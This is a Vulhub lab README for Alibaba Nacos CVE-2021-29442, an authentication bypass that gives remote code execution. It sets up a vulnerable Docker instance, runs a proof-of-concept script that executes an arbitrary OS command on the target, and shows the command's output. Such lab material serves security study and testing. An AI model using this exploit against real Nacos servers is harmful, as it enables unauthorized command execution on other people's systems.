aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/nacos/CVE-2021-29442/README.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

42 lines
2.5 KiB
Markdown
Raw Permalink Blame History

# Alibaba Nacos Authentication Bypass and Remote Code Execution (CVE-2021-29442)
[中文版本(Chinese version)](README.zh-cn.md)
Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management.
In the Nacos version before 1.4.1, some API endpoints such as `/nacos/v1/cs/ops/derby` are not protected and can be openly accessed by unauthenticated users. Attackers are able to execute arbitrary SQL statement and Java code.
References:
- <https://github.com/advisories/GHSA-xv5h-v7jh-p2qh>
- <https://github.com/alibaba/nacos/issues/4463>
- <https://github.com/ayoundzw/nacos-poc>
- <http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce>
## Vulnerable environment
Execute following command to start a Alibaba Nacos 1.4.0:
```
docker compose up -d
```
After server is started, brwose the `http://your-ip:8848/nacos/` you will see the default login page of Nacos.
## Exploit
Execute [POC](poc.py) to exploit the issue, the `-t` parameter specifies the target address, the `-c` parameter specifies the command to be executed:
```
python poc.py -t http://your-ip:8848 -c "ps aux"
```
And you will see the `ps aux` is executed successfully:
```json
{"code":200,"message":null,"data":""}
{"code":200,"message":null,"data":[{"B":0,"A":"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMANDroot 1 0.0 0.0 814608 4992 ? Ss 18:47 0:00 [rosetta] /bin/bash /bin/bash bin/docker-startup.shroot 31 25.5 7.5 10414040 1534908 ? Sl 18:47 1:14 [rosetta] /usr/lib/jvm/java-1.8.0-openjdk/bin/java /usr/lib/jvm/java-1.8.0-openjdk/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9555 -Xms2g -Xmx2g -Xmn1g -Dnacos.standalone=true -Dnacos.core.auth.enabled=true -Dnacos.member.list= -Djava.ext.dirs=/usr/lib/jvm/java-1.8.0-openjdk/jre/lib/ext:/usr/lib/jvm/java-1.8.0-openjdk/lib/ext:/home/nacos/plugins/health:/home/nacos/plugins/cmdb:/home/nacos/plugins/mysql -Xloggc:/home/nacos/logs/nacos_gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dnacos.home=/home/nacos -jar /home/nacos/target/nacos-server.jar --spring.config.location=/home/nacos/init.d/,file:/home/nacos/conf/,classpath:/,classpath:/config/,file:./,file:./config/ --spring.config.name=application,custom --logging.config=/home/nacos/conf/nacos-logback.xml --server.max-http-header-size=524288root 406 0.0 0.0 854552 5504 ? R 18:51 0:00 ps aux"}]}
```
![](1.png)
Reference in New Issue View Git Blame Copy Permalink